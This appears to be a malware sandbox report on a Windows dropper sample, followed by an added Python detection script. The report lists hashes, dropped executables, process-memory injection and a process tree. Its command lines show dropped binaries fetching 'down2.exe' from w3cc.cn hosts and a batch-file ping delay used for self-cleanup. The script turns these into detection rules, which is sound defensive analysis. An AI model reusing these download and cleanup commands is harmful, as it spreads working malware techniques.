Analysis

max time kernel:  150s
max time network: 150s
platform:         windows10-2004_x64
resource:         win10v2004-20240226-en
resource tags:    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted:        29/02/2024, 06:45
Static task: static1

Behavioral task: behavioral1
  Sample:   adf042c909d919ccca72d1bcf7338e71.exe
  Resource: win7-20240221-en

Behavioral task: behavioral2
  Sample:   adf042c909d919ccca72d1bcf7338e71.exe
  Resource: win10v2004-20240226-en
General

Target: adf042c909d919ccca72d1bcf7338e71.exe
Size:   175KB
MD5:    adf042c909d919ccca72d1bcf7338e71
SHA1:   bf9be4f139b3742d94593f3079f1f8836e5f5bb4
SHA256: 71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
SHA512: d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173
SSDEEP: 3072:C5YS+FskKww99rNeht/ry7LOp9NxTzW8U6Ao1Tcfk8BIo8/qDjrlXZ4EhNWwH:CSvVtw/Ijy7SpPn7LFSjrlXZ4E1
Malware Config
Signatures

YARA match
  resource:  behavioral2/files/0x000900000002321a-12.dat
  yara_rule: aspack_v212_v242

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence check. Only the query is recorded here; whether the sample branches on the returned value is not shown in this report.
  Key value queried: \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation
  Process:           adf042c909d919ccca72d1bcf7338e71.exe

Executes dropped EXE (5 IoCs)
  PID   Process
  3060  SOupMF.exe
  3096  DMWgpy.exe
  3884  xBjOcu.exe
  3108  RMsoSA.exe
  5104  eytYFB.exe

Drops file in System32 directory (8 IoCs)
  Event                         Path                                Process
  File created                  C:\Windows\SysWOW64\DMWgpy.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
  File created                  C:\Windows\SysWOW64\xBjOcu.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
  File created                  C:\Windows\SysWOW64\RMsoSA.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
  File created                  C:\Windows\SysWOW64\DelCAD.bat      DMWgpy.exe
  File created                  C:\Windows\SysWOW64\eytYFB.exe.tmp  adf042c909d919ccca72d1bcf7338e71.exe
  File created                  C:\Windows\SysWOW64\DelCAD.bat      xBjOcu.exe
  File created                  C:\Windows\SysWOW64\SOupMF.exe      adf042c909d919ccca72d1bcf7338e71.exe
  File opened for modification  C:\Windows\SysWOW64\SOupMF.exe      adf042c909d919ccca72d1bcf7338e71.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Runs ping.exe (1 TTP, 2 IoCs)
  PID   Process
  400   PING.EXE
  1928  PING.EXE

Suspicious use of WriteProcessMemory (27 IoCs)
  The report lists each parent-to-child write three times; the nine distinct writes are:
  Writer PID  Writer process                        Target PID  procid_target
  2700        adf042c909d919ccca72d1bcf7338e71.exe  3060        87
  2700        adf042c909d919ccca72d1bcf7338e71.exe  3096        88
  2700        adf042c909d919ccca72d1bcf7338e71.exe  3884        97
  2700        adf042c909d919ccca72d1bcf7338e71.exe  3108        98
  3096        DMWgpy.exe                            4372        99
  4372        cmd.exe                               400         101
  2700        adf042c909d919ccca72d1bcf7338e71.exe  5104        102
  3884        xBjOcu.exe                            2060        103
  2060        cmd.exe                               1928        105
Processes

The dropped binaries are launched with C:\Windows\system32\ paths but run from C:\Windows\SysWOW64\: the sample is a 32-bit process, and WOW64 file-system redirection maps system32 to SysWOW64 for it, which is why the image paths below differ from the command lines. The cmd.exe /c DelCAD.bat followed by ping -n 5 127.0.0.1 under DMWgpy.exe and xBjOcu.exe is the usual batch-file way of sleeping a few seconds before cleaning up; the contents of DelCAD.bat are not shown in this report.

PID 2700  C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"
          Checks computer location settings; Drops file in System32 directory; Suspicious use of WriteProcessMemory

  PID 3060  C:\Windows\SysWOW64\SOupMF.exe
            cmdline: "C:\Windows\system32\SOupMF.exe" showauto C:\Windows\system32\RQYknvIR.dll
            Executes dropped EXE

  PID 3096  C:\Windows\SysWOW64\DMWgpy.exe
            cmdline: "C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe
            Executes dropped EXE; Drops file in System32 directory; Suspicious use of WriteProcessMemory

    PID 4372  C:\Windows\SysWOW64\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
              Suspicious use of WriteProcessMemory

      PID 400   C:\Windows\SysWOW64\PING.EXE
                cmdline: ping -n 5 127.0.0.1
                Runs ping.exe

  PID 3884  C:\Windows\SysWOW64\xBjOcu.exe
            cmdline: "C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe
            Executes dropped EXE; Drops file in System32 directory; Suspicious use of WriteProcessMemory

    PID 2060  C:\Windows\SysWOW64\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat
              Suspicious use of WriteProcessMemory

      PID 1928  C:\Windows\SysWOW64\PING.EXE
                cmdline: ping -n 5 127.0.0.1
                Runs ping.exe

  PID 3108  C:\Windows\SysWOW64\RMsoSA.exe
            cmdline: "C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe
            Executes dropped EXE

  PID 5104  C:\Windows\SysWOW64\eytYFB.exe
            cmdline: "C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe
            Executes dropped EXE
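The process tree above is the kind of data a detection engineer turns into rules. The following Python script is an added example and not part of the Triage report: it rebuilds the tree as a constructed list of process-creation events (the field names pid, ppid, image and cmdline are this example's own, not a Triage or Sysmon schema), pulls the download URLs and their hostnames out of the command lines, flags the cmd.exe /c <file>.bat followed by ping -n N 127.0.0.1 delay chain, and lists every child launched from under C:\Windows\ by a parent running from a user's AppData\Local\Temp. All function names are the example's own.

```python
"""Added example (not part of the Triage report): turn the report's process
tree into simple detection logic.

EVENTS is constructed by hand from the Processes section of this page; the
field names pid/ppid/image/cmdline are this example's own, not a Triage or
Sysmon schema.
"""
import re
from urllib.parse import urlsplit

DROPPER = r"C:\Users\Admin\AppData\Local\Temp\adf042c909d919ccca72d1bcf7338e71.exe"

# Constructed from the process tree in this report (one dict per process).
EVENTS = [
    {"pid": 2700, "ppid": 0, "image": DROPPER, "cmdline": f'"{DROPPER}"'},
    {"pid": 3060, "ppid": 2700, "image": r"C:\Windows\SysWOW64\SOupMF.exe",
     "cmdline": r'"C:\Windows\system32\SOupMF.exe" showauto C:\Windows\system32\RQYknvIR.dll'},
    {"pid": 3096, "ppid": 2700, "image": r"C:\Windows\SysWOW64\DMWgpy.exe",
     "cmdline": r'"C:\Windows\system32\DMWgpy.exe" C:\Windows\system32\JSNVfa2.exe http://x2.w3cc.cn/dw/down2.exe'},
    {"pid": 4372, "ppid": 3096, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat"},
    {"pid": 400, "ppid": 4372, "image": r"C:\Windows\SysWOW64\PING.EXE",
     "cmdline": "ping -n 5 127.0.0.1"},
    {"pid": 3884, "ppid": 2700, "image": r"C:\Windows\SysWOW64\xBjOcu.exe",
     "cmdline": r'"C:\Windows\system32\xBjOcu.exe" C:\Windows\system32\vEzIRa2.exe http://x3.w3cc.cn/dw/down2.exe'},
    {"pid": 2060, "ppid": 3884, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c C:\Windows\system32\DelCAD.bat"},
    {"pid": 1928, "ppid": 2060, "image": r"C:\Windows\SysWOW64\PING.EXE",
     "cmdline": "ping -n 5 127.0.0.1"},
    {"pid": 3108, "ppid": 2700, "image": r"C:\Windows\SysWOW64\RMsoSA.exe",
     "cmdline": r'"C:\Windows\system32\RMsoSA.exe" C:\Windows\system32\DyeLGo2.exe http://x4.w3cc.cn/dw/down2.exe'},
    {"pid": 5104, "ppid": 2700, "image": r"C:\Windows\SysWOW64\eytYFB.exe",
     "cmdline": r'"C:\Windows\system32\eytYFB.exe" C:\Windows\system32\sFAvzS2.exe http://x3.w3cc.cn/dw/down2.exe'},
]

URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
PING_LOCALHOST_RE = re.compile(r"\bping(?:\.exe)?\s+-n\s+(\d+)\s+127\.0\.0\.1\b", re.IGNORECASE)
BAT_VIA_CMD_RE = re.compile(r"/c\s+\S+\.bat\b", re.IGNORECASE)


def _basename(path):
    """Last path component, lower-cased (Windows separators)."""
    return str(path).replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _by_pid(events):
    return {int(e["pid"]): e for e in events}


def extract_urls(events):
    """Every http(s) URL that appears in any command line."""
    urls = set()
    for e in events:
        urls.update(URL_RE.findall(str(e["cmdline"])))
    return urls


def extract_hosts(events):
    """Hostnames of those URLs, for blocklists and DNS hunting."""
    return {urlsplit(u).hostname for u in extract_urls(events)}


def find_ping_delay_chains(events):
    """Return (grandparent pid, cmd pid, ping pid, ping count) for every
    'ping -n N 127.0.0.1' whose parent is 'cmd.exe /c <file>.bat'. Pinging
    localhost N times is the batch-file idiom for sleeping a few seconds,
    typically so the script can delete a parent that has not exited yet."""
    by_pid = _by_pid(events)
    chains = []
    for e in events:
        m = PING_LOCALHOST_RE.search(str(e["cmdline"]))
        if not m:
            continue
        parent = by_pid.get(int(e["ppid"]))
        if parent is None or _basename(parent["image"]) != "cmd.exe":
            continue
        if not BAT_VIA_CMD_RE.search(str(parent["cmdline"])):
            continue
        chains.append((int(parent["ppid"]), int(parent["pid"]), int(e["pid"]), int(m.group(1))))
    return chains


def find_temp_to_windows_launches(events):
    """PIDs of processes whose image is under C:\\Windows\\ but whose parent
    runs from a user's AppData\\Local\\Temp: the 'executes dropped EXE from
    System32/SysWOW64' pattern in this report."""
    by_pid = _by_pid(events)
    hits = []
    for e in events:
        parent = by_pid.get(int(e["ppid"]))
        if parent is None:
            continue
        image = str(e["image"]).lower()
        parent_image = str(parent["image"]).lower()
        if image.startswith("c:\\windows\\") and "\\appdata\\local\\temp\\" in parent_image:
            hits.append(int(e["pid"]))
    return sorted(hits)


if __name__ == "__main__":
    for url in sorted(extract_urls(EVENTS)):
        print("url:", url)
    print("hosts:", sorted(extract_hosts(EVENTS)))
    for gp, cmd_pid, ping_pid, n in find_ping_delay_chains(EVENTS):
        print(f"delay chain: {gp} -> cmd.exe {cmd_pid} -> ping {ping_pid} (-n {n})")
    print("dropped EXEs launched from the Windows directory:", find_temp_to_windows_launches(EVENTS))
```

To run this against real telemetry, feed it Sysmon Event ID 1 (process creation) records mapped to the same four keys; the ping-chain check deliberately requires the cmd.exe parent to be running a .bat so that ordinary interactive ping usage does not match, and the Temp-to-Windows check keys on the parent's location rather than on the child's name, since the dropped file names here are random.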
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 35KB
  MD5:      78cd588e48bf05f83ac4d2e5bd3d32e2
  SHA1:     c96060325a397b397a1d60076ce6e2c11f309a4f
  SHA256:   5309590bc560b29b521f62e20b8d31ef848501814542939b6b943add30afa85e
  SHA512:   8cddb7332eec1e036b8466dd07c36557e471e531bfb191254d9c79d1212115378adc0a3111b983c168ce9fe09230ed1797dca4ab30fe16c3f735b98cee273e65

File 2
  Filesize: 141B
  MD5:      544926ed36528740dfc1d64a602e6d5c
  SHA1:     7837ae9e7da6054b79b1f1cbe810d838ed0ee3c5
  SHA256:   6e7bd49e44ffa47502cceb6fcf39dcb048d716cbe9f95b360c145b5fea64eec7
  SHA512:   8425d3c4282b576878c5ecc2a327634399338e626fd738192d2c766f8ecfa7f4bf539b476757c9174f111b6b7d108a39f90aaffcdc4b93ffda65b5594cb7210b

File 3
  Filesize: 141B
  MD5:      9c439a87b83755cde8511cf65e13e54e
  SHA1:     a72df147498f15d16d4004f73733d2602390e981
  SHA256:   d7c7639aa7fbe036c11bf35908fb2aa26171902482bb250233af19cd8f655bf3
  SHA512:   c483a77a2496f2daca73613be8a317c6fbf92de9cb569a0dd75a27f30fa4d6f251a4a1d26e3808716128cf4f48c72cbd81b5380c9b2d981be9be300eb49155eb

File 4 (the submitted sample)
  Filesize: 175KB
  MD5:      adf042c909d919ccca72d1bcf7338e71
  SHA1:     bf9be4f139b3742d94593f3079f1f8836e5f5bb4
  SHA256:   71580c963cd1262975add67f9c585bd6137753653ae1270c5177b0708ba9b0bd
  SHA512:   d8df82387b3b5630f14cb143b5c0e890f49fbd23cc298d8dca1dbe839ce8dc00bb0eb8f75ce546c33242b75e413625fe52f469416b316628f1bf10d3129db173